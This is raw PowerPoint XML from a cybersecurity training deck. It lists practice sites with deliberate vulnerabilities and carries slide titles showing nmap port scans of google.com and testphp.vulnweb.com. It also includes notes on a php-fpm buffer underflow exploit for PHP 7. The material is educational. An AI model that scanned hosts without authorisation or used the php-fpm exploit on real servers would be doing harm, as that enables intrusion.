            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Task -2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Finding vulnerable sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step -1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>First open a browser the search vulnerable websites. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step -2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Some sites will be shown </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>In contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> Step -3 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Vulnerable sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>CTFlearn</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; Google Gruyere</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Hellbound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> Hackers </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Multilidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> ||</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>HackThis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348710803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E096F0E7-E7B5-406E-8E94-F0043B2AC7F6}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AC41CBB0-BAA0-4983-8F2B-E10AF3358DA8}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="16c05727-aa75-4e4a-9b5f-8a80a1165891"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="71af3243-3dd4-4a8d-8c0d-dd76da1f02a5"/>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emplate>Circuit design</Template>
  <TotalTime>210</TotalTime>
  <Words>3780</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>398</Paragraphs>
  <Slides>39</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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="48" baseType="lpstr">
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bleeding Cowboys</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gautami</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>CYBER SECURITY</vt:lpstr>
      <vt:lpstr>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DAY -3                 Finding ports on -  nmap Step -1  Open kali linux  Step -2  Open terminal  Step -3  Nmap google.com ─(kali㉿kali)-[~] └─$ nmap google.com  Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-22 07:28 EDT Nmap scan report for google.com (142.251.42.46) Host is up (0.074s latency). Other addresses for google.com (not scanned): 2404:6800:4009:826::200e rDNS record for 142.251.42.46: bom12s20-in-f14.1e100.net Not shown: 998 filtered tcp ports (no-response) PORT    STATE SERVICE 80/tcp  open  http </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Step -1  testphp.vulnweb.com Step-2  In terminal  nmap testphp.vulnweb.com Starting Nmap 7.94 ( https//nmap.org ) at 2023-07-14 13:50 IST Nmap scan report for testphp.vulnweb.com (44.228.249.3) Host is up (0.28s latency). CVSSV3.1: rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com Not shown: 999 filtered tcp ports (no-response) CVE-ID: CVE-2022-417 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>## About PHP5 The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5. ## Credits Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.inioptions. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru). </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Broken Access Control </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerable and outdated Components </vt:lpstr>
      <vt:lpstr>identification and authentication failures </vt:lpstr>
      <vt:lpstr>software and data integrity failures </vt:lpstr>
      <vt:lpstr>Security logging and monitoring failures </vt:lpstr>
      <vt:lpstr>server - side request forgery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CYBER SECURITY</dc:title>
  <dc:creator>manoharsai7032@gmail.com</dc:creator>
  <cp:lastModifiedBy>win</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-21T04:47:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-31T09:56:08Z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